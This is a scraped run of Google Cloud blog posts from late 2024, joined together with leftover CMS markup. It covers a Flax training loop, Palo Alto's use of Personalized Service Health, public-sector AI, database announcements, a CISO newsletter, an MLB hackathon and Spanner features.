<ListValue: [StructValue([(‘code’, ‘# Full Training Loop rnimport optaxrnfrom flax.training import train_staternrn# TrainState as a convenience wrapper to help with the management of parameters and gradients rnoptimizer = optax.adam(learning_rate=0.01)rnrnstate = train_state.TrainState.create(rn apply_fn=flax_model.apply,rn params=params,rn tx=optimizer,rn)rnrndef train(state, train_dataloader, eval_dataloader, subdropout, num_epochs):rn for epoch in (pbar := tqdm(range(num_epochs))):rn pbar.set_description(f”Epoch {epoch}”)rn for batch in train_dataloader:rn state, loss = train_step(state, batch, subdropout)rnrn pbar.set_postfix(train_accuracy=eval(state, train_dataloader), eval_accuracy=eval(state, eval_dataloader))rnrn return staternrndef eval(state, eval_dataloader):rn total = 0rn num_correct = 0rn for batch in eval_dataloader:rn res = eval_step(state, batch)rn total += res.shape[0]rn num_correct += jnp.sum(res)rn return num_correct / totalrnrn@jitrndef train_step(state, batch, subdropout):rn def loss_fn(params):rn logits = state.apply_fn(params, batch[0], True, rngs={‘dropout’: subdropout})rn loss = optax.sigmoid_binary_cross_entropy(logits.squeeze(), batch[1]).mean()rn return lossrnrn grad_fn = jax.value_and_grad(loss_fn)rn loss, grads = grad_fn(state.params)rn # Pass grads to TrainState to get new TrainState with updated parameters, in functional programming stylern state = state.apply_gradients(grads=grads)rn return state, lossrnrn@jitrndef eval_step(state, batch):rn logits = state.apply_fn(state.params, batch[0], False)rn logits = logits.squeeze()rn preds = jnp.round(nn.sigmoid(logits))rn return preds == batch[1]’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3eea10fd2460>)])]>
Next steps
With the JAX/Flax knowledge you’ve gained from this blog post, you are now ready to write your own neural network. You can get started right away in Google Colab or Kaggle. Find a challenge on Kaggle and write a brand new model with Flax NNX, or start training a large language model (LLM) with MaxText — the possibilities are endless.
And we have just scratched the surface with JAX and Flax. To learn more about JIT, automatic vectorization, custom gradients, and more, check out the documentation for both JAX and Flax!
Cloud incidents happen. And when they do, it’s incumbent on the cloud service provider to communicate about the incident to impacted customers quickly and effectively — and for the cloud service consumer to use that information effectively, as part of a larger incident management response.
Google Cloud Personalized Service Health provides businesses with fast, transparent, relevant, and actionable communication about Google Cloud service disruptions, tailored to a specific business at its desired level of granularity. Cybersecurity company Palo Alto Networks is one Google Cloud customer and partner that recently integrated Personalized Service Health signals into the incident workflow for its Google Cloud-based PRISMA Access offering, saving its customers critical minutes during active incidents.
By programmatically ingesting Personalized Service Health signals into advanced workflow components, Palo Alto can quickly make decisions such as triggering contingency actions to protect business continuity.
Let’s take a closer look at how Palo Alto integrated Personalized Service Health into its operations.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e0f9e2f90a0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
The Personalized Service Health integration
Palo Alto ingests Personalized Service Health logs into its internal AIOps system, which centralizes incident communications for PRISMA Access and applies advanced techniques to classify and distribute signals to the people responsible for responding to a given incident.
Personalized Service Health UI Incident list view
Users of Personalized Service Health can filter what relevance levels they want to see. Here, “Partially related” reflects an issue anywhere in the world with the products that are used. “Related” reflects that the problem is detected within the data center regions, while “Impacted” means that Google has verified the impact to the customer for specific services.
While Google is still confirming an incident, Personalized Service Health communicates some of these incidents as ‘PSH Emerging Incident’ to provide customers with early notification. Once Google confirms the incident, these incidents are merged with ‘PSH Confirmed Incidents’. This helps customers respond faster to a specific incident that’s impacting their environment or escalate back to Google, if needed.
Personalized Service Health distributes updates throughout an active incident, typically every 30 minutes, or sooner if there’s progress to share. These updates are also written to logs, which Palo Alto ingests into AIOps.
Responding to disruptive, unplanned cloud service provider incidents can be accelerated by programmatically ingesting and distributing incident communications. This is especially true in large-scale organizations such as Palo Alto, which has multiple teams involved in incident response for different applications, workloads and customers.
Fueling the incident lifecycle
Palo Alto further leverages the ingested Personalized Service Health signals in its AIOps platform, which uses machine learning (ML) and analytics to automate IT operations. AIOps harnesses big data from operational appliances to detect and respond to issues instantaneously. AIOps correlates these signals with internally generated alerts to declare an incident that is affecting multiple customers. These AIOps alerts are tied to other incident management tools that assist with managing the incident lifecycle, including communication, regular updates and incident resolution.
In addition, a data enrichment pipeline takes Personalized Service Health incidents, adds Palo Alto’s related information, and publishes the events to Pub/Sub. AIOps then consumes the incident data from Pub/Sub, processes it, correlates it to related events signals, and notifies subscribed channels.
Palo Alto organizes Google Cloud assets into folders within the Google Cloud console. Each project represents a Palo Alto PRISMA Access customer. To receive incident signals that are likewise specific to end customers, Palo Alto creates a log sink that’s specific to each folder, aggregating service health logs at the folder level. Palo Alto then receives incident signals specific to each customer so it can take further action.
Palo Alto drives the following actions based on incident communications flowing from Google Cloud:
Proactive detection of zonal, inter-regional, external en-masse failures
Accurately identifying workloads affected by cloud provider incidents
Correlation of product issue caused by cloud service degradation in Google Cloud Platform itself
Seeing Personalized Service Health’s value
Incidents caused by cloud providers often go unnoticed or are difficult to isolate without involving multiple of the cloud provider’s teams (support, engineering, SRE, account management). The Personalized Service Health alerting framework plus AIOps correlation engine allows Palo Alto’s SRE teams to isolate issues caused by a cloud provider near-instantaneously.
Palo Alto’s incident management workflow is designed to address mass failures versus individual customer outages, ensuring the right teams are engaged until the incidents are resolved. This includes notifying relevant parties, such as the on-call engineer and the Google Cloud support team. With Personalized Service Health, Palo Alto can capture both event types i.e., mass failures as well as individual customer outages.
Palo Alto gets value from Personalized Service Health in multiple ways, beginning with faster incident response and contingency actions with which to optimize business continuity, especially for impacted customers of PRISMA Access. In the event of an incident impacting them, Prisma Access customers naturally seek and expect information from Palo Alto. By ensuring this information flows rapidly from Google Cloud to Palo Alto’s incident response systems, Palo Alto is able to provide more insightful answers to these end customers, and plans to serve additional Palo Alto use cases based on both existing and future Personalized Service Health capabilities.
Take your incident management to the next level
Google Cloud is continually evolving Personalized Service Health to provide deeper value for all Google Cloud customers — from startups, to ISVs and SaaS providers, to the largest enterprises. Ready to get started? Learn more about Personalized Service Health, or reach out to your account team.
2024 was a year of incredible innovation and progress, as we continue to invest in bringing the best of Google AI to our customers around the world. The public sector is adopting the latest AI technologies with the right guardrails built in, and we are seeing incredible energy around this technology in agencies across the country – whether that be gathering and analyzing information at the most critical times to create operational resilience and readiness, protecting our nation’s critical infrastructure and resources, or creating more innovative and secure ways to protect and serve constituents.
Google’s AI innovations and advancements are accelerating missions and impact, from advancing defense research at the Air Force Research Laboratory, to transforming DoD’s data utilization with generative AI, improving access to children’s behavioral healthcare resources with the Illinois Department of Human Services (DHS), addressing climate challenges with Hawaii Department of Transportation, modernizing infrastructure and supporting a cutting-edge research program with UC Riverside, and developing AI models to assist augmented reality microscope (ARM) detection of certain types of cancer with the Defense Innovation Unit (DIU).
Over the last year we unveiled transformative AI breakthroughs that will have a lasting and positive impact on people and society. Here are some of the latest AI innovations from Google that I am most proud of, that will help improve government services, enhance decision-making, and ultimately create a more efficient and effective public sector.
A leap forward in quantum computing
Google’s latest quantum computing chip, Willow, demonstrates significant advancements in the field. Willow has state-of-the-art performance across a number of metrics, enabling two major achievements. The first is that Willow can reduce errors exponentially as we scale up using more qubits. This cracks a key challenge in quantum error correction that the field has pursued for almost 30 years. Second, Willow performed a standard benchmark computation in under five minutes that would take one of today’s fastest supercomputers 10 septillion (that is, 1025) years — a number that vastly exceeds the age of the Universe. For public sector customers, this means enhanced research capabilities, as quantum computing can revolutionize fields like life sciences and drug discovery by enabling complex simulations and analysis.
The next generation of AI models
In October 2024 at our Gemini at Work event, we showcased transformative generative AI use cases from our customers across industries and shared a number of announcements. Building on that momentum, we have made several exciting announcements including Gemini 2.0 – our most capable model yet, which represents a significant evolution in AI capabilities and the next era of models built for this new agentic era. With new advances in multimodality — like native image and audio output — and native tool use, it will enable us to build new AI agents that bring us closer to our vision of a universal assistant.
We also unveiled Google Agentspace which unlocks enterprise expertise for employees with agents that bring together Gemini’s advanced reasoning, Google-quality search, and enterprise data, regardless of where it’s hosted. We’ve also made important updates and upgrades including:
NotebookLM, our powerful research assistant, used by millions globally, is getting even better with Gemini 2.0 Flash, a new interface, and premium features in NotebookLM Plus.
Project Mariner, which combines strong multimodal understanding and reasoning capabilities to automate tasks using your browser and Project Astra, our research prototype exploring future capabilities of a universal AI assistant.
Open foundation models to help developers more easily build AI models for healthcare applications, initially focused on imaging applications in radiology, dermatology and pathology. Our Nobel Prize winning work with Google DeepMind further underscores how AI is accelerating scientific breakthroughs and being used to help to address the world’s most pressing challenges.
For public sector organizations, we believe these advancements in AI, quantum computing and other cutting edge technologies will enable increased agility and efficiency by automating tasks and processes and freeing up resources for more strategic initiatives. We are also providing improved data accessibility through integration with existing data sources, and bolstering security by leveraging Google Cloud’s robust security infrastructure. Together, these advancements represent an exciting milestone in the Gemini era and highlight Google’s commitment to pushing the boundaries of technology and delivering innovative solutions for our customers.
Our commitment to the public sector
Looking ahead, we remain committed to helping our public sector customers – spanning state and local government, civilian, defense, and intelligence agencies – as they look to Google Public Sector to help meet their mission. We will continue to invest in our accredited commercial cloud, ensuring the public sector gets what the private sector gets: the same features, services and compute power that’s critical for AI workloads. Today, we have 140 services and counting at FEDRAMP High as well as the General availability of 51 services for CJIS compliance within Assured Workloads including Vertex AI services. Google Cloud provides the most extensive data center footprint for FedRAMP High workloads of any cloud service provider, with nine U.S. regions to choose from.
In addition to investing in an open platform powered by the latest AI innovations and most robust security, we are also investing in training and upskilling the next generation of public sector leaders. We recently announced our Google Cloud Launchpad for Veterans – a no-cost training and certification journey to equip veterans in all roles and at all levels with the cloud knowledge and skills needed to drive innovation, and contribute to their employer’s digital transformation strategy. We also introduced a new AI training initiative through Google.org’s AI Opportunity Fund – with $15 million for AI skills training to help U.S. public sector workers develop responsible AI skills.
At Google Public Sector, we’re passionate about supporting your mission. Learn more about how Google’s AI solutions can empower your agency and see examples of how we are helping accelerate mission impact with AI here.
Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Cloud Database Management Systems for the fifth year in a row. Google is positioned furthest in vision among all vendors evaluated; we believe this is a testament to Google’s innovations that help tens of thousands of Data Cloud customers across all industries build applications faster and unlock deeper insights through a unified data and AI approach.
Download the complimentary 2024 Gartner Magic Quadrant for Cloud Database Management Systems report.
AI is driving the need for better data management
A Gartner survey finds 61% of organizations are evolving their D&A (data and analytics) operating model because of AI technologies.1 With AI powering today’s biggest innovations, customers need a simpler way to unify and integrate their data. This is particularly true for businesses with a multi-layered data foundation, including various data models such as graph and document, semi-structured and unstructured data, and a variety of file formats and standards.
At the same time, organizations need AI-assisted tools and agents, as well as the ability to build these capabilities for their customers and employees. Simply put, they want to be innovators, not just integrators. And lastly, governance across the data estate and AI models is becoming even more critical as gen AI opens up huge opportunities, but also risks when not grounded in truth with their enterprise data.
Driving innovation with Google’s AI-powered Data Cloud
Google provides a unified, intelligent and open Data Cloud that’s designed to address the most pressing data challenges facing customers today. Google’s Data Cloud is built on planet-scale infrastructure with AI at its core, empowering teams to unlock deeper insights and build applications faster. With unmatched reliability, performance, security, and global scale, it enables organizations to operate efficiently and solve their toughest data problems.
Leveraging Google’s deep expertise and decades of innovations, we have built a pre-integrated Data Cloud that seamlessly unifies data services, enabling them to work better together while delivering unique intelligence into the platform. We are committed to being the most open platform, offering unmatched choice and flexibility to meet diverse customer needs. And that’s why we believe the Gartner recognition is based on Google’s completeness of vision and ability to execute.
We’re delivering on three key pillars: end-to-end unified data platform, accelerating innovation with AI-assistive and agentic experiences, and an open data ecosystem for the gen AI era. Let’s learn more.
End-to-end unified data platform
The unified data platform simplifies data management and enhances business outcomes by unifying data management, governance and analysis. We’ve built deep integration from data to AI, spanning AI infrastructure, foundation models, multiple storage options, and multiple engines. This unified multimodal data foundation enables multiple engines to work seamlessly together for analytics, streaming, machine learning, and AI.
Some recent advancements include:
BigQuery Unified Platform: We’re enhancing BigQuery’s multimodal data processing capabilities with support for structured and unstructured data, as well as diverse formats, including fully managed Iceberg tables, Delta, and Hudi. We introduced native BigQuery support for Apache Spark alongside SQL, offering flexibility in engine choice. BigQuery metastore now supports OSS engines such as Apache Spark and Flink. And with BigQuery universal catalog, we’ve simplified governance for the entire BigQuery platform, providing automated data discovery, curation and management at scale.
Multi-model data support: With the introduction of new Spanner Graph, full-text search and vector search capabilities, we’ve evolved Spanner to a multi-model database with intelligent capabilities that enable customers to deliver a new class of AI-enabled applications — all built on top of a globally consistent, virtually unlimited scale database that offers up to 99.999% availability.
Unified operational and analytical systems: We’re unifying operational and analytical workloads to drive real-time intelligence. With BigQuery and Spanner Data Boost, customers can now query live operational data directly without compromising performance of their operational systems. And with Reverse ETL through BigQuery and Bigtable integrations, customers can push those insights back into operational systems, closing the loop and driving immediate action.
Streaming and real-time intelligence: BigQuery empowers real-time insights with robust streaming and real-time support. We introduced continuous queries to analyze data as it streams into BigQuery, unlocking insights and enabling truly event-driven applications. And, with BigQuery Managed Service for Apache Kafka, organizations can easily ingest and process real-time data streams.
Accelerating innovation with AI-assistive and agentic experiences
The rise of generative AI has fueled a surge in data and machine learning operations as enterprises activate their data to unlock new possibilities. BigQuery, for example, has seen an 80% increase in machine learning operations in six months with customers running tens of millions of prediction and training queries every month, and nearly 7x growth in the use of LLMs for model inference in 2024. For operational data, AlloyDB supercharges PostgreSQL vector search and can scale to over a billion vectors with its ScaNN index, also available in BigQuery, while Spanner supports vector searches scaling to more than 10B vectors.
A few of the latest innovations include:
Activating AI on business data: We’re integrating AI deeper into our Data Cloud. Tight integration with Vertex AI provides access to 160+ Google and open-source foundation models, so businesses can perform LLM inferencing, ground, and fine-tune models directly within BigQuery, AlloyDB, Spanner, and Cloud SQL using their enterprise data. Document AI, Vision AI, and speech-to-text APIs enable scalable unstructured data analysis, with governance over multimodal data via object tables within BigQuery.
Vector search across Google’s Data Cloud:We are turbocharging vector search workloads, helping you to quickly build intelligent, AI applications with your own trusted, enterprise data for any customer or industry use case. Our built-in vector support across all databases including BigQuery, AlloyDB, Cloud SQL, Spanner, and more, letting you store and search vector embeddings with speed and ease without moving data or managing additional systems. We’re also deeply integrating with third-party orchestration frameworks like LangChain and LlamaIndex for building increasingly sophisticated enterprise apps and continue to innovate with Google’s innovative ScaNN algorithm, bringing 12 years of Google research to our Data Cloud customers.
Gemini across Google’s Data Cloud: BigQuery is advancing automation with Gemini data agents, enabling trusted and governed workflows across data engineering, governance, and analytics. Recently, we launched a conversational analytics agent where customers can ask questions of their BigQuery data in natural language; this capability is also now available as a conversational analytics API for customers to build their own experiences. In addition, Gemini in databases & Gemini in BigQuery allow users to have access to an AI-powered assistant that provides them with fleet management capabilities, workload optimization, data insights & exploration. Additionally administrators get proactive recommendations for managing, securing, governing and optimizing databases, as well as code and schema conversions in Database Migration Service to supercharge legacy database modernization projects.
Open data ecosystem for the gen AI era
We are committed to being the most open cloud provider, empowering data teams to build modern, data-driven applications wherever their workloads reside. By supporting open source and open standards including Iceberg, Delta, Hudi, MySQL, Valkey, and PostgreSQL, Google Cloud enables teams to build Lakehouse architectures with fully managed services compatible with popular open-source engines and models.
Bringing cutting-edge technology to customers faster
As a Leader in this report for the past five consecutive years, we have witnessed remarkable growth with customers. For example:
APEX Fintech Solutions leveraged AlloyDB to achieve a 50% reduction in processing time, enabling margin calculations for 100,000 accounts in just one minute — a significant improvement in efficiency and scalability.
Bayer migrated to AlloyDB for PostgreSQL to streamline data operations, centralize solutions and improve collaboration across the company, which helped reduce response times by over 50% on average and increased throughput by 5x compared to its previous PostgreSQL solution.
What’s next
We are excited to work with you on your journey to the cloud in this gen AI era. To learn more about our placement, download the complimentary 2024 Gartner Magic Quadrant for Cloud Database Management Systems report.
Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s Research & Advisory organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.
Welcome to the second Cloud CISO Perspectives for December 2024. To close out the year, I’m sharing the top Google Cloud security updates in 2024 that attracted the most interest from the security community. There’s a lot of AI, of course, as well as a few surprises.
As with all Cloud CISO Perspectives, the contents of this newsletter are posted to the Google Cloud blog. If you’re reading this on the website and you’d like to receive the email version, you can subscribe here.
–Phil Venables, VP, TI Security & CISO, Google Cloud
aside_block
<ListValue: [StructValue([(‘title’, ‘Get vital board insights with Google Cloud’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3485767c40>), (‘btn_text’, ‘Visit the hub’), (‘href’, ‘https://cloud.google.com/solutions/security/board-of-directors?utm_source=cloud_sfdc&utm_medium=email&utm_campaign=FY24-Q2-global-PROD941-physicalevent-er-CEG_Boardroom_Summit&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
From gen AI to threat intelligence: 2024 in review
By Phil Venables, VP, TI Security & CISO, Google Cloud
While generative AI erupted from the confines of IT to the world at large in 2023, this year we saw gen AI begin to rapidly and truly change cybersecurity. At the same time, Google Cloud continued to drive towards our goals of bringing simplicity, streamlining operations, and enhancing efficiency and effectiveness for security essentials.
To that end, I’m sharing our top stories from four important areas of development in cybersecurity: security and AI, the security ecosystem, threat intelligence, and security operations.
Phil Venables, VP, TI Security & CISO, Google Cloud
Security and AI
At the end of 2023 in an update to my blog on security megatrends, I shared that enabling progress in AI means focusing on the opportunities it presents, the responsibilities we bear as we develop it, and securing AI from malicious use and hacking. This theme continued over the course of the year, as we encouraged both AI use cases in cybersecurity and the development of responsible AI use and risk management policies.
This year, our integrated threat intelligence products and services from across Mandiant, VirusTotal, and Google presented a comprehensive view of the threat landscape, helping customers to operationalize the data and enable a more proactive security program. We introduced our Google Cloud Threat Intelligence blog to share insight from all of the Google intelligence teams. We also announced new ways to help keep our customers safe, including updated best practices aligned to our Defender’s Advantage framework, expanded managed services, and additional avenues for threat intelligence sharing.
We believe that a modern security operations solution should be intelligence-driven, AI-powered, and capable of fueling productivity while empowering defenders to handle new threats. We leaned into this approach this year, focusing on innovation, improvement, and education.
As security professionals, we know that threat actors will continue to innovate to achieve their mission objectives. To help defenders proactively prepare for the coming year, we put together this forecast report with insights from across Google. We look forward to sharing more insights to help organizations strengthen their security posture in the new year.
For more leadership guidance from Google Cloud experts, please see ourCISO Insights hub.
aside_block
<ListValue: [StructValue([(‘title’, ‘Join the Google Cloud CISO Community’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3485767ca0>), (‘btn_text’, ‘Learn more’), (‘href’, ‘https://rsvp.withgoogle.com/events/ciso-community-interest?utm_source=cgc-blog&utm_medium=blog&utm_campaign=2024-cloud-ciso-newsletter-events-ref&utm_content=-&utm_term=-‘), (‘image’, <GAEImage: GCAT-replacement-logo-A>)])]>
In case you missed it
Here are the latest updates, products, services, and resources from our security teams so far this month:
The Prompt: Gen AI demystified: Understanding gen AI types and their risks: To help business leaders better understand AI uses, we’re looking at common types of gen AI and prioritized the risks for each. Read more.
How to make the cloud an engine for manufacturing success: In spite of challenges and threats facing the manufacturing sector, we see significant cause for optimism. Here’s why.
Google Cloud’s commitment to responsible AI is now ISO/IEC certified: We’re thrilled to announce that Google Cloud has achieved an accredited ISO/IEC 42001:2023 certification for our AI management system. Read more.
To help combat fraud, Google Cloud and Swift pioneer advanced AI and federated learning tech: To better combat fraud in cross-border payments, Swift joins with Google Cloud to develop anti-fraud AI and federated learning tech. Read more.
CTI Program Design Playbook is now available: To help you better operationalize threat intelligence, we’ve published the Cyber Threat Intelligence Program Design Playbook, developed for professionals who actively defend networks. Read more.
How Google Cloud helps navigate your DPIA and AI privacy compliance journey: We’re continually improving our DPIA Resource Center with updated content and guidance. Here’s what’s new.
How Virgin Media O2 uses Privileged Access Manager to achieve least privilege: Henry Tze, head of DevOps for Virgin Media O2, explains how Google Cloud powers the backbone of their daily operations and shares his insights. Read more.
Google Cloud first CSP to join BRC, MFG-ISAC, and affiliates to advance security: Google Cloud is proud to be the first cloud service provider to partner with the GRF Business Resilience Council and its affiliates. Read more.
Announcing expanded custom Org Policy portfolio of supported products: Our custom Organization Policy can help you safeguard cloud resources, and it now works with even more of our services. Read more.
How Google Cloud can help customers achieve compliance with NIS2: NIS2 may require new investments in security tools, talent, and processes. Here’s how Google Cloud can help make those achievements. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Introducing XRefer, a Gemini-assisted binary navigator: XRefer is a new Gemini-powered cluster analysis tool that can help analysts break down the structure of malware and its behavior, and also help them navigate its code for deeper analysis. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Google Cloud Security and Mandiant podcasts
Phil Venables on the future of resilience: Google Cloud CISO Phil Venables joins hosts Anton Chuvakin and Tim Peacock to discuss the apparent sudden rise of resilience, the PCAST report (and Google’s take on it), and the importance of leading indicators. Listen here.
Go beyond the blame game when sharing cloud responsibility: Rich Mogull, senior vice-president, cloud security, Firemon, and CEO, Securosis, talks about shared irresponsibilities and whether blame needs a framework with Anton. Listen here.
Detection as code and the rise of response engineering: Amine Besson, detection engineering tech lead, Behemoth Cyberdefence, chats with Anton about how to do detection engineering when you don’t want to engineer anything. Listen here.
Behind the Binary: From software cracking to threat hunting: Renowned threat hunter Ryan Chapman sits down with host Josh Stroschein to talk about his journey from a curious young hacker to a formidable force in cybersecurity, and the early days of reverse engineering. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in January with more security-related updates from Google Cloud.
Developers, it’s time to take your skills to the ballpark! Are you ready to step out of the bleachers and onto the field where code collides with my (and America’s) favorite pastime? Get ready to swing for the fences at the Google Cloud X MLB Hackathon — powered by the groundbreaking Gemini family of models. Submit your projects by February 4, 2025 for a chance to win big.
Batter up!
What’s in your equipment bag? Get ready to use:
Gemini: Google’s most capable AI models, built from the ground up for multimodality. We’re talking text, code, images, audio, and video — all understood and processed seamlessly. Plus, Gemini boasts lightning-fast response times and the power to handle massive datasets, so you can focus on building epic fan experiences.
Real MLB datasets: You’ll have access to a treasure trove of historical game data, stats and content. This is your chance to mine insights and unlock the hidden stories within America’s pastime.
Google Cloud: Build, deploy, and scale your project with the power of Google Cloud Platform. We’re talking Vertex AI, BigQuery, Cloud Functions, and the full suite of tools you need to bring your vision to life.
Five challenges. Step up to the plate
Bring innovation to the baseball fan experience in one of five ways:
Wild card – fan experience: Think outside the batter’s box! This is your chance to knock our socks off with any project that uses the provided datasets to redefine how fans experience the game we love.
Personalized fan highlights: Ditch the one-size-fits-all highlights! Build a system that curates personalized audio, video, and text digests based on a fan’s favorite teams, players, and even preferred language.
Real-time “tool tips”: Turn casual viewers into armchair analysts with an interactive application that delivers real-time strategic insights. Explain the “why” behind every steal, strikeout, and home run as it happens.
Generate Statcast data from old videos: Give classic games the Statcast treatment! Use computer vision to extract key metrics (pitch speed, exit velocity, etc.) from archival game footage. Think Moneyball meets the digital age.
Prospect prediction: Can your code spot the next MLB superstar? Build a platform that analyzes prospect data to project future MLB potential and career impact, leveraging historical comparisons and predictive modeling.
Be an all-star, see the All-Stars
Get ready to cash in on some serious prizes:
Overall Grand Prize: $20,000, $5,000 in Google Cloud credits, a chance to deliver a keynote demo at Google Cloud Next ’25 (April 9-11, 2025), tickets and travel to the conference, tickets to the 2025 MLB® All-Star Game® presented by Mastercard, a meeting with a Google team member, and social media promotion.
Best of Challenge Prizes (for each challenge): $5,000, $2,500 in Google Cloud credits, a chance to demo at Google Cloud Next ’25, tickets to the conference, a virtual meeting with a Google team member, and social media promotion.
Ready to code the future of baseball?
Head over to next2025challenge.devpost.com to learn more, review the rules, and register. It’s time to prove that your code is ready for the big leagues. See you on the diamond!
NPN. Must be age of majority. Ends 5:00 p.m. ET on 4 Feb 2025 See goo.gle/mlbhackathon. Major League Baseball trademarks and copyrights are used with permission of Major League Baseball. Visit MLB.com.
If you’re a regular reader of this blog, you know that 2024 was a busy year for Google Cloud. From AI to Zero Trust, and everything in between, here’s a chronological recap of our top blogs of 2024, according to readership. You’ll probably see some favorites on this list, and discover a few that you missed the first time around.
January
We started the new year strong, removing data transfer fees for anyone moving data off of our platform. Translation: Anyone doing cool things on Google Cloud (like using generative AI to analyze their microservices deployment) is doing it because they want to, not because they have to. And in business news, we shared how to make the most out of your data and AI in the coming year.
From local GPUs, to model libraries, to distributed system design, the second month of 2024 was the first of many to come where AI topics dominated the charts. Our Transform team explored gen AI’s impact on various industries.
If it wasn’t already obvious, this month’s top-read blogs showed that our core audience is developers pushing the boundaries of innovation. Business leaders, meanwhile, read about best practices for securely deploying AI on Google Cloud.
Watch out, here comes Google Cloud Next, where we made a record 218 announcements; the top three are listed here. Readers were also keen to hear about how Citadel Securities built out a research platform on Google Cloud.
We don’t always get it right, but when there’s a problem, we’re committed to providing you with accurate, timely information with which to make your own assessments. We’re also committed to making you, and customers like McLaren Racing, go really, really fast when developing new AI-based applications.
Whether you wanted to modernize your databases, deliver higher system reliability, create really cool AI-powered apps, or learn how legendary companies tackle data management, the Google Cloud blog was your go-to source midway through the year.
We talk a lot about “meeting customers where they are.” Sometimes that means a disaster zone, a remote research station, or a truck cruising down the highway. Over on Transform, you read about the history of our custom Axion and TPU chips.
Just when you thought you knew how to run AI inference, your available graph database options, or the name of Google Cloud’s event-driven programming service, we went and changed things up. We like to keep you on your toes 😉 And business readers got a first look at AI agents — more to come on this.
You’ve been generating (and storing) business data for years. Now, we’re making it easier for you to make sense of, and actually use, that data. Speaking of using data, the Transform team compiled a jaw-dropping list of the real-world ways customers are using gen AI in their organizations.
According to this month’s most-read blog, 75% of you rely on AI for at least one daily professional responsibility, including code writing, information summarization, and code explanation, and experience “moderate” to “extreme” productivity gains. So it was no big surprise that business leaders wanted to read about how to develop an AI strategy.
Not content to hold the existing record for most nodes in a Kubernetes cluster (15,000), we went ahead and more than quadrupled it, to the delight of AI unicorns. But whether you work for an AI unicorn, or just a plain old zebra, all Google Cloud users needs to start using multi-factor authentication next year, as well as learn how to avoid comman AI pitfalls.
We’re closing out the year on an AI highnote, with the availability of amazing new image and video generation models, as well as the new Trillium TPU, which Google used to train Gemini 2.0, our most capable AI model… yet. Be on the lookout for how these technologies — and many others — will reshape your industry and how you work in the coming year.
Spanner is Google’s always-on, virtually unlimited database that powers planet-scale applications like Gmail, YouTube, and Google Photos. Outside of Google, Spanner powers demanding workloads for household brands like Yahoo!, The Home Depot, Wayfair, and Pokémon Go. Today, Spanner handles over 4 billion queries per second at peak and more than 15 exabytes of data, with five 9s of availability, plus global consistency.
Since we first discussed it in 2012, Spanner has evolved from a groundbreaking distributed SQL database into a versatile, intelligent innovation platform. 2024 was a big year for Spanner, with multiple launches that expanded its functional capabilities, pushed the envelope on price-performance, re-architected it for best-in-class reliability and security, and enhanced the developer experience. Here is a recap of Spanner’s biggest innovations of the year and how you can benefit from them.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e22bceecb50>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
1. Multi-model — one database, many possibilities
With the launch of Spanner Graph, full-text search and vector search, Spanner went from being a highly available, globally consistent and scalable database, to a multi-model database with intelligent, interoperable capabilities with which you can build AI-enabled applications. Unlike other multi-model databases on the market, Spanner offers a true multi-model experience that allows interoperability between different data models without downtime.
Spanner’s multi-model support lets you consolidate databases, saving on costs and reducing operational overhead, governance, and security touchpoints, while its interoperability eliminates data movement for a “true ZeroETL” experience with consistent data across all models. This helps enable use cases like near-real-time fraud detection, supply chain optimization, or product recommendations.
Fig1: A SQL query on Spanner showing interleaved usage of graph, relational, and vector models and full-text search
2. Improving price-performance
Spanner’s price-performance lets you dream big, start small (for as little as $65/mo), and scale linearly with no cliffs. In 2022, we increased the storage per node from 2T to 4T, and in 2023 we built on this with a 50% increase in throughput and a 2.5X increase in storage at no additional cost.
This year, with the launch of new multi-model capabilities, we wanted to make it simple and cost effective for you to use these capabilities without charging incrementally for every new feature. The result was Spanner editions, an intuitive, tier-based pricing approach that offers different capabilities at various price points to fit you diverse needs and budgets, all while providing flexibility, cost transparency and additional cost saving opportunities.
3. A new home for your Cassandra workloads
The Cassandra NoSQL database is prized for its speed and scalability. It also has limitations, such as limited support for complex queries and difficulty modeling intricate relationships. Spanner combines the scalability and availability of NoSQL with the strong consistency and relational model of traditional databases, for the best of both worlds.
This year, we launched the Cassandra to Spanner Proxy Adapter, an open-source, plug-and-play tool that makes it easier than ever to move your Cassandra workload to Spanner with near-zero changes to your application logic. Customers like Yahoo! and Reltio are loving the ease of use of the Cassandra proxy adapter, and we’re excited to help customers be more successful with Cassandra on Spanner.
4. Generative AI and the Spanner ecosystem
Over the past year, we’ve witnessed a remarkable shift in how organizations leverage generative AI. But gen AI comes with risk of hallucinations. We believe thattransactional and analytical databases can help reduce these,bridging the gap between foundation models and enterprise gen AI apps. Here’s how:
Vector support: With vector support for Spanner, developers can perform similarity searches on vector embeddings stored in the database. Spanner vector search supports both exact KNN and approximate ANN searches, providing flexibilit for different workloads that leverage Google’s scalable nearest neighbor (ScaNN) algorithm, providing fast and accurate results, even on large datasets. Spanner now supports vector searches scaling to more than 10 billion vectors. Developers can combine vector searches with regular SQL and graph GQL queries to power use-cases like RAG applications.
